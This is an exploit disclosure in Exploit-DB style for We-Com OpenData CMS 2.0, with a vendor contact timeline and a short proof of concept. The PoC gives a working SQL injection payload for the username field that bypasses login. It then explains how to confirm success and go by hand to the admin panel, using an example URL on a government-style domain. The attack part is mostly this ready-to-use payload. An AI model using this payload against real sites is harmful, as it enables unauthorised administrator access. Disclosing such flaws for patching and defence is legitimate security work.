We-Com OpenData CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
ec40e47ff0cb9b4ba525a2dff42ae8cd
# Exploit Title: We-com OpenData CMS 2.0 Authentication Bypass / SQL Injection
# Google Dork:N/A
# Date: 2020-04-17
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://www.we-com.it/
# Version: 2.0
# Tested on: 5.5.0-kali1-amd64
---------------------------------------------------------
Vendor contact timeline:
2020-05-05: Contacting vendor through [email protected]
2020-05-26: A Patch is published in the version
2020-06-01: Release of security advisory
Authentication Bypass / SQL Injection in the opendata 2.0 CMS
PoC:
Payload(s)
USERNAME: admin' or '1' = '1'; -- -
PASSWORD: vvv
the SQL injection attack has resulted in a bypass of the login,to confirm you will get a reponse in header of the page with "okokokokokokokokokokokokokok"
But will not redirect you to the control panel so you wil need to do it manual
https://www.site.gov.it/admin/?mod=mod_admin
and we are now authenticated as "adminstrator".